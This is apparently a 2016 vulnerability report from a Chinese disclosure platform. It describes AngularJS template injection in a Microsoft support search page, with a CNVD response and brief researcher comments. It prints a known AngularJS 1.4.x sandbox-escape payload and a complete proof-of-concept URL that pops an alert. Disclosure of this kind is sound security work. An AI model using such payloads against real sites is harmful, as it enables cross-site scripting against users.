microsoft.com某站点AngularJS模板标签注入漏洞

AngularJS模板标签注入

http://**.**.**.**/en-us/support/search?query=aaa{{111%2b111}}bbb&xstart=8

如上图所示，angular JS版本是1.4.1

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

poc:

http://**.**.**.**/en-us/support/search?query=aaa{{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1}%20}%20};alert(%22)//%27);}}bbb&xstart=8

最后再次感谢portswigger团队: http://**.**.**.**/2016/01/xss-without-html-client-side-template.html

upgrade and apply xss filters

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2016-04-01 16:21

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态：

暂无

1. 2016-03-29 11:23 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

   1

   前排。。。

   1# 回复此人

2. 2016-03-29 11:30 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   1

   66666

   2# 回复此人

3. 2016-03-29 11:33 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   1

   前排。。。

   3# 回复此人

4. 2016-03-29 12:13 | cwkiller ( 普通白帽子 | Rank:174 漏洞数:39 | 闭关修炼)

   1

   6666

   4# 回复此人

5. 2016-03-29 12:14 | 包包 ( 实习白帽子 | Rank:77 漏洞数:34 | 我是菜鸟，我怕谁？小弟新来，望大牛多多包...)

   1

   前排

   5# 回复此人

6. 2016-03-29 13:24 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

   1

   lijiejie，求姿势

   6# 回复此人

7. 2016-03-29 19:16 | range ( 普通白帽子 | Rank:192 漏洞数:40 | 刷洞买mac)

   1

   牛逼！

   7# 回复此人

8. 2016-03-30 10:30 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

   1

   求姿势分享啊

   8# 回复此人